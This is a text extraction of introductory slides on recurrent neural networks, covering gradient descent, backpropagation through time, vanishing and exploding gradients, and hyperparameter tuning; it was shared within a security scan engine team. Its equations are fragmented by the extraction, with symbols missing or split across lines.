*exp(x2
) +exp(x2
) |x=2
= 5*exp(4)
∂w/∂x=v=exp(u)=exp(x^2)
71. 2.1 Recall DNN, Optimization (batch)
Training Data: { (X1
, ȳ1
), (X2
, ȳ2
), … , (Xr
, ȳr
), …. (XR
, ȳR
)}
- Gradient Descent
i
⬅ i-1
- η * C( i-1
), C( i-1
) = ∑ Cr
( i-1
)
- Stochastic Gradient Descent
i
⬅ i-1
- η * Cr
( i-1
)
- Mini Batch Gradient Descant
i
⬅ i-1
- η * C( i-1
), C( i-1
) = ∑ Cr
( i-1
)
1
R r
Use all sample for each update
Use one sample for each update
1
B r
∈ b
72. 2.2 Lets Go Back to RNN
- Why memory Important ?
- What kind of problem can be handled by RNN ?
- Simple RNN structure
- Why it is so hard to train ?
- Classic variant (LSTM, GRU)
94. 2.3 Simple RNN, Cost Function
= (Xt
, h; )
= A(Wi
* Xt
+ Wh
* h + b)
= { Wi
, Wh
, b }
pick the best model = best function
= best *
2.Model
Model Structure
Cost Function
Optimization
function set
timestep
C( )= ∑( k
ln( ȳk
)+(1- k
)ln(1- ȳk
))
-1
k
k
95. 2.3 Simple RNN, Optimization, Back Propogation?
= (Xt
, h; )
= A(Wi
* Xt
+ Wh
* h + b)
= { Wi
, Wh
, b }
pick the best model = best function
= best *
2.Model
Model Structure
Cost Function
Optimization
function set
timestep
C( )= ∑( k
ln( ȳk
)+(1- k
)ln(1- ȳk
))
-1
k
k
99. 2.3 Simple RNN, BPTT, gradient problem
X1
X2
X3
X4
X10
X5
‘v’ ‘a’ ‘r’ ‘ ‘ ‘e’ …. ‘E’
js
Error Signal ઠ
Amplifier
AmplifierAmplifierAmplifierAmplifier
Update W needs
Error Signal * (Amplifier)10
Vanishing
gradient problem
Exploding
100. 2.3 Simple RNN, BPTT, gradient problem
Update W needs
Error Signal * (Amplifier)10
Vanishing
gradient problem
Exploding
direction + large value
var exwFrE
112. 3 How to Tune Ur Model
- Basic Metrics
- Model HyperParameters
- Visualization Inspiration
- Optimization Setup
- Network Structure
113. 3.1 Basic Metrics
DataSet Real World
Training Data Testing Data
Trainging Data Validation Data Real Testing
Do I get good
results on
training set ?
- Code has bug ?
- Cannot find a good function
- Bad Model (no good function in hyp. set)
Do I get good
results on
validation set ?
- over fitting ?
YES
YES
NoNo
114. = (Xt
, h; )
= σ(Wi
*Xt
+ Wh
*h + b)
= { Wi
, Wh
, b }
3.2 Model HyperParameter
Simple RNN
These are parameters
- number of epoch (training iteration)
- |h|: Hidden Layer Size
- : Number of Layers
- C(): cost function
- Batch Size (stochastic, mini-batch, ..)
- Parameter Initial value
- A: activation function (tanh, sigmoid, Relu
1
⬅ 0
- η * C( 0
) : Learning
Rate
- Regularization (Dropout, Zoneout)
- Forget Gate Bias
- Gate Initialize
- Implicit zero padding
Grid Search ?
119. 4. View Problem in CNN
var evwfrE
[23, 2, 19, 0, 6, 23, 24, 7, 19, 32]
0 0 0 0 0 0 0 1 0 0
0 0 0 0 0 0 0 0 0 1
0 0 1 0 0 0 0 0 0 0
1 0 0 1 0 1 0 0 0 0
....
0 1 0 0 1 0 1 0 0 0
0 0 0 0 0 0 0 0 1 0
var evwfrE 98x10
x
1
x
2
x
3
x
4
... x
7
x
8
x
9
x
0
r r...
y
120. 5 A Sequence to Sequence Problem
- Three different ways to solved the problem: HMM, CTC, Attention
121. Topics Not Cover
- Bi-directional RNN and other RNN variants
- Attention-based RNN
- structure learning vs. RNN
122. Reference
- Most of content are from Prof Lee @ NTU:
http://speech.ee.ntu.edu.tw/~tlkagk/courses/
- https://danijar.com/tips-for-training-recurrent-neural-networks/
- https://medium.com/@erikhallstrm/hello-world-rnn-83cd7105b767
This slides share @ trend micro scan engine team as an entry level sharing for
team member at 2017/9/4
If any suggestion or correction please mail to chuchuhao831@gmail.com
Or just leave comment on google slides -> link